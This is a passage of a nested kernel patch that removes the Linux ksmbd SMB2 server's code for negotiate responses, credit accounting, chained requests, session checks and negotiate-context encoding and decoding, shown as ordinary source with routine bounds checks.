+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(2);
+-	rsp_hdr->Command = SMB2_NEGOTIATE;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = 0;
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-
+-	WARN_ON(ksmbd_conn_good(conn));
+-
+-	rsp->StructureSize = cpu_to_le16(65);
+-	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+-	rsp->DialectRevision = cpu_to_le16(conn->dialect);
+-	/* Not setting conn guid rsp->ServerGUID, as it
+-	 * not used by client for identifying connection
+-	 */
+-	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-	/* Default Max Message Size till SMB2.0, 64K*/
+-	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
+-	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
+-	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
+-
+-	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
+-	rsp->ServerStartTime = 0;
+-
+-	rsp->SecurityBufferOffset = cpu_to_le16(128);
+-	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+-	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+-		le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			AUTH_GSS_LENGTH);
+-	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+-	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+-		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+-	conn->use_spnego = true;
+-
+-	ksmbd_conn_set_need_negotiate(conn);
+-	return 0;
+-}
+-
+-/**
+- * smb2_set_rsp_credits() - set number of credits in response buffer
+- * @work:	smb work containing smb response buffer
+- */
+-int smb2_set_rsp_credits(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *hdr = ksmbd_resp_buf_next(work);
+-	struct ksmbd_conn *conn = work->conn;
+-	unsigned short credits_requested, aux_max;
+-	unsigned short credit_charge, credits_granted = 0;
+-
+-	if (work->send_no_response)
+-		return 0;
+-
+-	hdr->CreditCharge = req_hdr->CreditCharge;
+-
+-	if (conn->total_credits > conn->vals->max_credits) {
+-		hdr->CreditRequest = 0;
+-		pr_err("Total credits overflow: %d\n", conn->total_credits);
+-		return -EINVAL;
+-	}
+-
+-	credit_charge = max_t(unsigned short,
+-			      le16_to_cpu(req_hdr->CreditCharge), 1);
+-	if (credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
+-			    credit_charge, conn->total_credits);
+-		return -EINVAL;
+-	}
+-
+-	conn->total_credits -= credit_charge;
+-	conn->outstanding_credits -= credit_charge;
+-	credits_requested = max_t(unsigned short,
+-				  le16_to_cpu(req_hdr->CreditRequest), 1);
+-
+-	/* according to smb2.credits smbtorture, Windows server
+-	 * 2016 or later grant up to 8192 credits at once.
+-	 *
+-	 * TODO: Need to adjuct CreditRequest value according to
+-	 * current cpu load
+-	 */
+-	if (hdr->Command == SMB2_NEGOTIATE)
+-		aux_max = 1;
+-	else
+-		aux_max = conn->vals->max_credits - conn->total_credits;
+-	credits_granted = min_t(unsigned short, credits_requested, aux_max);
+-
+-	conn->total_credits += credits_granted;
+-	work->credits_granted += credits_granted;
+-
+-	if (!req_hdr->NextCommand) {
+-		/* Update CreditRequest in last request */
+-		hdr->CreditRequest = cpu_to_le16(work->credits_granted);
+-	}
+-	ksmbd_debug(SMB,
+-		    "credits: requested[%d] granted[%d] total_granted[%d]\n",
+-		    credits_requested, credits_granted,
+-		    conn->total_credits);
+-	return 0;
+-}
+-
+-/**
+- * init_chained_smb2_rsp() - initialize smb2 chained response
+- * @work:	smb work containing smb response buffer
+- */
+-static void init_chained_smb2_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *rsp = ksmbd_resp_buf_next(work);
+-	struct smb2_hdr *rsp_hdr;
+-	struct smb2_hdr *rcv_hdr;
+-	int next_hdr_offset = 0;
+-	int len, new_len;
+-
+-	/* Len of this response = updated RFC len - offset of previous cmd
+-	 * in the compound rsp
+-	 */
+-
+-	/* Storing the current local FID which may be needed by subsequent
+-	 * command in the compound request
+-	 */
+-	if (req->Command == SMB2_CREATE && rsp->Status == STATUS_SUCCESS) {
+-		work->compound_fid = ((struct smb2_create_rsp *)rsp)->VolatileFileId;
+-		work->compound_pfid = ((struct smb2_create_rsp *)rsp)->PersistentFileId;
+-		work->compound_sid = le64_to_cpu(rsp->SessionId);
+-	}
+-
+-	len = get_rfc1002_len(work->response_buf) - work->next_smb2_rsp_hdr_off;
+-	next_hdr_offset = le32_to_cpu(req->NextCommand);
+-
+-	new_len = ALIGN(len, 8);
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_hdr) + new_len - len);
+-	rsp->NextCommand = cpu_to_le32(new_len);
+-
+-	work->next_smb2_rcv_hdr_off += next_hdr_offset;
+-	work->next_smb2_rsp_hdr_off += new_len;
+-	ksmbd_debug(SMB,
+-		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
+-		    new_len, work->next_smb2_rcv_hdr_off,
+-		    work->next_smb2_rsp_hdr_off);
+-
+-	rsp_hdr = ksmbd_resp_buf_next(work);
+-	rcv_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!(rcv_hdr->Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
+-		ksmbd_debug(SMB, "related flag should be set\n");
+-		work->compound_fid = KSMBD_NO_FID;
+-		work->compound_pfid = KSMBD_NO_FID;
+-	}
+-	memset((char *)rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->Command = rcv_hdr->Command;
+-
+-	/*
+-	 * Message is response. We don't grant oplock yet.
+-	 */
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR |
+-				SMB2_FLAGS_RELATED_OPERATIONS);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = rcv_hdr->MessageId;
+-	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
+-	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
+-	rsp_hdr->SessionId = rcv_hdr->SessionId;
+-	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+-}
+-
+-/**
+- * is_chained_smb2_message() - check for chained command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      true if chained request, otherwise false
+- */
+-bool is_chained_smb2_message(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	unsigned int len, next_cmd;
+-
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	hdr = ksmbd_req_buf_next(work);
+-	next_cmd = le32_to_cpu(hdr->NextCommand);
+-	if (next_cmd > 0) {
+-		if ((u64)work->next_smb2_rcv_hdr_off + next_cmd +
+-			__SMB2_HEADER_STRUCTURE_SIZE >
+-		    get_rfc1002_len(work->request_buf)) {
+-			pr_err("next command(%u) offset exceeds smb msg size\n",
+-			       next_cmd);
+-			return false;
+-		}
+-
+-		if ((u64)get_rfc1002_len(work->response_buf) + MAX_CIFS_SMALL_BUFFER_SIZE >
+-		    work->response_sz) {
+-			pr_err("next response offset exceeds response buffer size\n");
+-			return false;
+-		}
+-
+-		ksmbd_debug(SMB, "got SMB2 chained command\n");
+-		init_chained_smb2_rsp(work);
+-		return true;
+-	} else if (work->next_smb2_rcv_hdr_off) {
+-		/*
+-		 * This is last request in chained command,
+-		 * align response to 8 byte
+-		 */
+-		len = ALIGN(get_rfc1002_len(work->response_buf), 8);
+-		len = len - get_rfc1002_len(work->response_buf);
+-		if (len) {
+-			ksmbd_debug(SMB, "padding len %u\n", len);
+-			inc_rfc1001_len(work->response_buf, len);
+-			if (work->aux_payload_sz)
+-				work->aux_payload_sz += len;
+-		}
+-	}
+-	return false;
+-}
+-
+-/**
+- * init_smb2_rsp_hdr() - initialize smb2 response
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0
+- */
+-int init_smb2_rsp_hdr(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
+-	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->Command = rcv_hdr->Command;
+-
+-	/*
+-	 * Message is response. We don't grant oplock yet.
+-	 */
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = rcv_hdr->MessageId;
+-	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
+-	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
+-	rsp_hdr->SessionId = rcv_hdr->SessionId;
+-	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+-
+-	work->syncronous = true;
+-	if (work->async_id) {
+-		ksmbd_release_id(&conn->async_ida, work->async_id);
+-		work->async_id = 0;
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_allocate_rsp_buf() - allocate smb2 response buffer
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise -ENOMEM
+- */
+-int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	size_t small_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	size_t large_sz = small_sz + work->conn->vals->max_trans_size;
+-	size_t sz = small_sz;
+-	int cmd = le16_to_cpu(hdr->Command);
+-
+-	if (cmd == SMB2_IOCTL_HE || cmd == SMB2_QUERY_DIRECTORY_HE)
+-		sz = large_sz;
+-
+-	if (cmd == SMB2_QUERY_INFO_HE) {
+-		struct smb2_query_info_req *req;
+-
+-		req = smb2_get_msg(work->request_buf);
+-		if ((req->InfoType == SMB2_O_INFO_FILE &&
+-		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
+-		     req->FileInfoClass == FILE_ALL_INFORMATION)) ||
+-		    req->InfoType == SMB2_O_INFO_SECURITY)
+-			sz = large_sz;
+-	}
+-
+-	/* allocate large response buf for chained commands */
+-	if (le32_to_cpu(hdr->NextCommand) > 0)
+-		sz = large_sz;
+-
+-	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-
+-	work->response_sz = sz;
+-	return 0;
+-}
+-
+-/**
+- * smb2_check_user_session() - check for valid session for a user
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_check_user_session(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	unsigned int cmd = conn->ops->get_cmd_val(work);
+-	unsigned long long sess_id;
+-
+-	work->sess = NULL;
+-	/*
+-	 * SMB2_ECHO, SMB2_NEGOTIATE, SMB2_SESSION_SETUP command do not
+-	 * require a session id, so no need to validate user session's for
+-	 * these commands.
+-	 */
+-	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
+-	    cmd == SMB2_SESSION_SETUP_HE)
+-		return 0;
+-
+-	if (!ksmbd_conn_good(conn))
+-		return -EINVAL;
+-
+-	sess_id = le64_to_cpu(req_hdr->SessionId);
+-	/* Check for validity of user session */
+-	work->sess = ksmbd_session_lookup_all(conn, sess_id);
+-	if (work->sess)
+-		return 1;
+-	ksmbd_debug(SMB, "Invalid user session, Uid %llu\n", sess_id);
+-	return -EINVAL;
+-}
+-
+-static void destroy_previous_session(struct ksmbd_conn *conn,
+-				     struct ksmbd_user *user, u64 id)
+-{
+-	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+-	struct ksmbd_user *prev_user;
+-	struct channel *chann;
+-	long index;
+-
+-	if (!prev_sess)
+-		return;
+-
+-	prev_user = prev_sess->user;
+-
+-	if (!prev_user ||
+-	    strcmp(user->name, prev_user->name) ||
+-	    user->passkey_sz != prev_user->passkey_sz ||
+-	    memcmp(user->passkey, prev_user->passkey, user->passkey_sz))
+-		return;
+-
+-	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
+-		ksmbd_conn_set_exiting(chann->conn);
+-}
+-
+-/**
+- * smb2_get_name() - get filename string from on the wire smb format
+- * @src:	source buffer
+- * @maxlen:	maxlen of source string
+- * @local_nls:	nls_table pointer
+- *
+- * Return:      matching converted filename on success, otherwise error ptr
+- */
+-static char *
+-smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
+-{
+-	char *name;
+-
+-	name = smb_strndup_from_utf16(src, maxlen, 1, local_nls);
+-	if (IS_ERR(name)) {
+-		pr_err("failed to get name %ld\n", PTR_ERR(name));
+-		return name;
+-	}
+-
+-	ksmbd_conv_path_to_unix(name);
+-	ksmbd_strip_last_slash(name);
+-	return name;
+-}
+-
+-int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-	struct ksmbd_conn *conn = work->conn;
+-	int id;
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
+-
+-	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
+-	if (id < 0) {
+-		pr_err("Failed to alloc async message id\n");
+-		return id;
+-	}
+-	work->syncronous = false;
+-	work->async_id = id;
+-	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
+-
+-	ksmbd_debug(SMB,
+-		    "Send interim Response to inform async request id : %d\n",
+-		    work->async_id);
+-
+-	work->cancel_fn = fn;
+-	work->cancel_argv = arg;
+-
+-	if (list_empty(&work->async_request_entry)) {
+-		spin_lock(&conn->request_lock);
+-		list_add_tail(&work->async_request_entry, &conn->async_requests);
+-		spin_unlock(&conn->request_lock);
+-	}
+-
+-	return 0;
+-}
+-
+-void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	smb2_set_err_rsp(work);
+-	rsp_hdr->Status = status;
+-
+-	work->multiRsp = 1;
+-	ksmbd_conn_write(work);
+-	rsp_hdr->Status = 0;
+-	work->multiRsp = 0;
+-}
+-
+-static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
+-{
+-	if (S_ISDIR(mode) || S_ISREG(mode))
+-		return 0;
+-
+-	if (S_ISLNK(mode))
+-		return IO_REPARSE_TAG_LX_SYMLINK_LE;
+-	else if (S_ISFIFO(mode))
+-		return IO_REPARSE_TAG_LX_FIFO_LE;
+-	else if (S_ISSOCK(mode))
+-		return IO_REPARSE_TAG_AF_UNIX_LE;
+-	else if (S_ISCHR(mode))
+-		return IO_REPARSE_TAG_LX_CHR_LE;
+-	else if (S_ISBLK(mode))
+-		return IO_REPARSE_TAG_LX_BLK_LE;
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_get_dos_mode() - get file mode in dos format from unix mode
+- * @stat:	kstat containing file mode
+- * @attribute:	attribute flags
+- *
+- * Return:      converted dos mode
+- */
+-static int smb2_get_dos_mode(struct kstat *stat, int attribute)
+-{
+-	int attr = 0;
+-
+-	if (S_ISDIR(stat->mode)) {
+-		attr = FILE_ATTRIBUTE_DIRECTORY |
+-			(attribute & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM));
+-	} else {
+-		attr = (attribute & 0x00005137) | FILE_ATTRIBUTE_ARCHIVE;
+-		attr &= ~(FILE_ATTRIBUTE_DIRECTORY);
+-		if (S_ISREG(stat->mode) && (server_conf.share_fake_fscaps &
+-				FILE_SUPPORTS_SPARSE_FILES))
+-			attr |= FILE_ATTRIBUTE_SPARSE_FILE;
+-
+-		if (smb2_get_reparse_tag_special_file(stat->mode))
+-			attr |= FILE_ATTRIBUTE_REPARSE_POINT;
+-	}
+-
+-	return attr;
+-}
+-
+-static void build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt,
+-			       __le16 hash_id)
+-{
+-	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(38);
+-	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
+-	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
+-	pneg_ctxt->HashAlgorithms = hash_id;
+-}
+-
+-static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
+-			       __le16 cipher_type)
+-{
+-	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(4);
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->CipherCount = cpu_to_le16(1);
+-	pneg_ctxt->Ciphers[0] = cipher_type;
+-}
+-
+-static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
+-				   __le16 comp_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Flags = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
+-}
+-
+-static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
+-				__le16 sign_algo)
+-{
+-	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16((sizeof(struct smb2_signing_capabilities) + 2)
+-			- sizeof(struct smb2_neg_context));
+-	pneg_ctxt->Reserved = cpu_to_le32(0);
+-	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->SigningAlgorithms[0] = sign_algo;
+-}
+-
+-static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
+-	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	pneg_ctxt->Name[0] = 0x93;
+-	pneg_ctxt->Name[1] = 0xAD;
+-	pneg_ctxt->Name[2] = 0x25;
+-	pneg_ctxt->Name[3] = 0x50;
+-	pneg_ctxt->Name[4] = 0x9C;
+-	pneg_ctxt->Name[5] = 0xB4;
+-	pneg_ctxt->Name[6] = 0x11;
+-	pneg_ctxt->Name[7] = 0xE7;
+-	pneg_ctxt->Name[8] = 0xB4;
+-	pneg_ctxt->Name[9] = 0x23;
+-	pneg_ctxt->Name[10] = 0x83;
+-	pneg_ctxt->Name[11] = 0xDE;
+-	pneg_ctxt->Name[12] = 0x96;
+-	pneg_ctxt->Name[13] = 0x8B;
+-	pneg_ctxt->Name[14] = 0xCD;
+-	pneg_ctxt->Name[15] = 0x7C;
+-}
+-
+-static void assemble_neg_contexts(struct ksmbd_conn *conn,
+-				  struct smb2_negotiate_rsp *rsp,
+-				  void *smb2_buf_len)
+-{
+-	char *pneg_ctxt = (char *)rsp +
+-			le32_to_cpu(rsp->NegotiateContextOffset);
+-	int neg_ctxt_cnt = 1;
+-	int ctxt_size;
+-
+-	ksmbd_debug(SMB,
+-		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+-	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
+-			   conn->preauth_info->Preauth_HashId);
+-	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
+-	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
+-	ctxt_size = sizeof(struct smb2_preauth_neg_context);
+-	/* Round to 8 byte boundary */
+-	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
+-
+-	if (conn->cipher_type) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
+-				   conn->cipher_type);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt +=
+-			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
+-				 8);
+-	}
+-
+-	if (conn->compress_algorithm) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-		/* Temporarily set to SMB3_COMPRESS_NONE */
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
+-				       conn->compress_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
+-				      8);
+-	}
+-
+-	if (conn->posix_ext_supported) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_posix_neg_context);
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
+-	}
+-
+-	if (conn->signing_negotiated) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
+-		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
+-				    conn->signing_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
+-	}
+-
+-	inc_rfc1001_len(smb2_buf_len, ctxt_size);
+-}
+-
+-static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt,
+-				  int ctxt_len)
+-{
+-	/*
+-	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
+-	 * which may not be present. Only check for used HashAlgorithms[1].
+-	 */
+-	if (ctxt_len <
+-	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
+-		return STATUS_INVALID_PARAMETER;
+-
+-	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+-		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+-
+-	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
+-	return STATUS_SUCCESS;
+-}
+-
+-static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+-				struct smb2_encryption_neg_context *pneg_ctxt,
+-				int ctxt_len)
+-{
+-	int cph_cnt;
+-	int i, cphs_size;
+-
+-	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
+-		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
+-		return;
+-	}
+-
+-	conn->cipher_type = 0;
+-
+-	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
+-	cphs_size = cph_cnt * sizeof(__le16);
+-
+-	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
+-	    ctxt_len) {
+-		pr_err("Invalid cipher count(%d)\n", cph_cnt);
+-		return;
+-	}
+-
+-	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
+-		return;
+-
+-	for (i = 0; i < cph_cnt; i++) {
+-		if (pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_GCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_CCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_CCM ||
+-		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_GCM) {
+-			ksmbd_debug(SMB, "Cipher ID = 0x%x\n",
+-				    pneg_ctxt->Ciphers[i]);
+-			conn->cipher_type = pneg_ctxt->Ciphers[i];
+-			break;
+-		}
+-	}
+-}
+-
+-/**
+- * smb3_encryption_negotiated() - checks if server and client agreed on enabling encryption
+- * @conn:	smb connection
+- *
+- * Return:	true if connection should be encrypted, else false
+- */
+-bool smb3_encryption_negotiated(struct ksmbd_conn *conn)
+-{
+-	if (!conn->ops->generate_encryptionkey)
+-		return false;
+-
+-	/*
+-	 * SMB 3.0 and 3.0.2 dialects use the SMB2_GLOBAL_CAP_ENCRYPTION flag.
+-	 * SMB 3.1.1 uses the cipher_type field.
+-	 */
+-	return (conn->vals->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION) ||
+-	    conn->cipher_type;
+-}
+-
+-static void decode_compress_ctxt(struct ksmbd_conn *conn,
+-				 struct smb2_compression_capabilities_context *pneg_ctxt)
+-{
+-	conn->compress_algorithm = SMB3_COMPRESS_NONE;
+-}
+-
+-static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+-				 struct smb2_signing_capabilities *pneg_ctxt,
+-				 int ctxt_len)
+-{
+-	int sign_algo_cnt;
+-	int i, sign_alos_size;
+-
+-	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
+-		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
+-		return;
+-	}
+-
+-	conn->signing_negotiated = false;
+-	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
+-	sign_alos_size = sign_algo_cnt * sizeof(__le16);
+-
+-	if (sizeof(struct smb2_signing_capabilities) + sign_alos_size >
+-	    ctxt_len) {
+-		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
+-		return;
+-	}
+-
+-	for (i = 0; i < sign_algo_cnt; i++) {
+-		if (pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_HMAC_SHA256_LE ||
+-		    pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_AES_CMAC_LE) {
+-			ksmbd_debug(SMB, "Signing Algorithm ID = 0x%x\n",
+-				    pneg_ctxt->SigningAlgorithms[i]);
+-			conn->signing_negotiated = true;
+-			conn->signing_algorithm =
+-				pneg_ctxt->SigningAlgorithms[i];
+-			break;
+-		}
+-	}
+-}
+-
+-static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+-				      struct smb2_negotiate_req *req,
+-				      unsigned int len_of_smb)
+-{
+-	/* +4 is to account for the RFC1001 len field */
+-	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
+-	int i = 0, len_of_ctxts;
+-	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
+-	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
+-	__le32 status = STATUS_INVALID_PARAMETER;
+-
+-	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
+-	if (len_of_smb <= offset) {
+-		ksmbd_debug(SMB, "Invalid response: negotiate context offset\n");
+-		return status;
+-	}
+-
+-	len_of_ctxts = len_of_smb - offset;
+-
+-	while (i++ < neg_ctxt_cnt) {
+-		int clen, ctxt_len;
+-
+-		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
+-			break;
+-
+-		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+-		clen = le16_to_cpu(pctx->DataLength);
+-		ctxt_len = clen + sizeof(struct smb2_neg_context);
+-
+-		if (ctxt_len > len_of_ctxts)
+-			break;
+-
